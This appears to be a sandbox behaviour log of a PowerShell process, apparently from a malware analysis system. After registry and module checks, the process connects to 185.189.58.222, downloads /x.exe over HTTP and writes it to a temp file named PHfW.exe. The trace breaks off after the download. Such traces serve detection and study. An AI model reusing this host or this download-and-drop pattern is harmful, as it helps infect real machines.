File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.WSMan.Management, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\MMAgent, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\MsDtc, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\MSMQ, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetAdapter, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetConnection, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetEventPacketCapture, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetLbfo, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetNat, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetQos, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetSecurity, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetSwitchTeam, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetTCPIP, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetworkConnectivityStatus, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetworkSwitchManager, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetworkTransition, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PcsvDevice, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PKI, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PnpDevice, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PrintManagement, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Provisioning, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSDiagnostics, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSScheduledJob, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSWorkflow, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\ScheduledTasks, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SecureBoot, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SmbShare, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SmbWitness, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\StartLayout, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Storage, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\TLS, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\TroubleshootingPack, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\TrustedPlatformModule, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\UEV, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\VpnClient, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Wdac, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsDeveloperLicense, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsSearch, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsUpdate, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_attributes True 5
Fn
System Get Info type = System Directory, result_out = C:\WINDOWS\system32 True 1
Fn
File Get Info filename = C:\WINDOWS\system32\wldp.dll, type = file_attributes True 1
Fn
System Get Info type = Hardware Information True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE False 1
Fn
File Create filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_type True 2
Fn
File Read filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, size = 4096, size_out = 2435 True 1
Fn
Data
File Read filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, size = 637, size_out = 0 True 1
Fn
File Read filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, size = 4096, size_out = 0 True 1
Fn
System Get Info type = System Directory, result_out = C:\WINDOWS\system32 True 1
Fn
File Get Info filename = C:\WINDOWS\system32\wldp.dll, type = file_attributes True 1
Fn
System Get Info type = Hardware Information True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_attributes True 2
Fn
File Create filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_type True 2
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\en-US\Microsoft.PowerShell.Utility.psd1, type = file_attributes False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\en\Microsoft.PowerShell.Utility.psd1, type = file_attributes False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\PSGetModuleInfo.xml, type = file_attributes False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll\Microsoft.PowerShell.Commands.Utility.dll, type = file_attributes False 1
Fn
Environment Get Environment String name = PSMODULEPATH, result_out = C:\Users\FD1HVy\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules True 1
Fn
File Get Info filename = C:\Users\FD1HVy\Documents\WindowsPowerShell\Modules, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utility, type = file_attributes False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_attributes True 1
Fn
System Get Info type = System Directory, result_out = C:\WINDOWS\system32 True 1
Fn
File Get Info filename = C:\WINDOWS\system32\wldp.dll, type = file_attributes True 1
Fn
System Get Info type = Hardware Information True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_attributes True 3
Fn
File Create filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_type True 2
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
File Create filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_type True 2
Fn
File Read filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, size = 4096, size_out = 4096 True 7
Fn
Data
File Read filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, size = 4096, size_out = 1920 True 1
Fn
Data
File Read filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, size = 128, size_out = 0 True 1
Fn
File Read filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, size = 4096, size_out = 0 True 1
Fn
System Get Info type = System Directory, result_out = C:\WINDOWS\system32 True 1
Fn
File Get Info filename = C:\WINDOWS\system32\wldp.dll, type = file_attributes True 1
Fn
System Get Info type = Hardware Information True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE False 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_attributes True 2
Fn
File Create filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_type True 2
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Environment Get Environment String name = PSModuleAutoLoadingPreference False 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type True 1
Fn
Module Get Filename process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, type = file_attributes True 2
Fn
File Create filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, type = file_type True 2
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, size = 4096, size_out = 4096 True 8
Fn
Data
File Read filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, size = 4096, size_out = 3215 True 1
Fn
Data
File Read filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, size = 4096, size_out = 0 True 1
Fn
Module Get Filename process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 True 1
Fn
File Get Info filename = C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe.config, type = file_attributes False 2
Fn
File Create filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, type = file_type True 2
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework, value_name = LegacyWPADSupport, type = REG_NONE False 1
Fn
Inet Open Session access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC True 1
Fn
Environment Get Environment String name = PinnableBufferCache_System.Net.HttpWebRequest_Disabled False 1
Fn
Environment Get Environment String name = PinnableBufferCache_System.Net.HttpWebRequest_MinCount False 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Environment Get Environment String name = PinnableBufferCache_System.Net.Connection_Disabled False 1
Fn
Environment Get Environment String name = PinnableBufferCache_System.Net.Connection_MinCount False 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Fn
Socket Connect remote_address = 185.189.58.222, remote_port = 80 True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 69, size_out = 69 True 1
Fn
Data
Inet Open Session access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Inet Open Connection protocol = http, server_name = 185.189.58.222, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /x.exe True 1
Fn
Inet Send HTTP Request headers = host: 185.189.58.222, connection: Keep-Alive, url = 185.189.58.222/x.exe True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 4096, size_out = 4096 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 4096 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 53984 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 53984 True 1
Fn
Data
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 53709 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 2904 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 2904 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 11616 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 11616 True 1
Fn
Data
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 10424 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 2904 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 2904 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 23232 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 23232 True 1
Fn
Data
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 22040 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 31944 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 31944 True 1
Fn
Data
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 31944 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 8712 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 8712 True 1
Fn
Data
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 8712 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 40656 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 40656 True 1
Fn
Data
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 40656 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 34848 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 34848 True 1
Fn
Data
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 34848 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 46507, size_out = 1452 True 1
Fn
Data
Inet Read Response size = 46507, size_out = 1452 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 45055, size_out = 1452 True 1
Fn
Data
Inet Read Response size = 45055, size_out = 1452 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 43603, size_out = 11616 True 1
Fn
Data
Inet Read Response size = 43603, size_out = 11616 True 1
Fn
Data
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 10424 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 31987, size_out = 1452 True 1
Fn
Data
Inet Read Response size = 31987, size_out = 1452 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 30535, size_out = 30535 True 1
Fn
Data
Inet Read Response size = 30535, size_out = 30535 True 1
Fn
Data
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe, size = 27891 True 1
Fn
Data
Environment Get Environment String name = PSModuleAutoLoadingPreference False 1
Fn
Environment Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps;;C:\Program Files\Microsoft Office\root\Client True 1
Fn
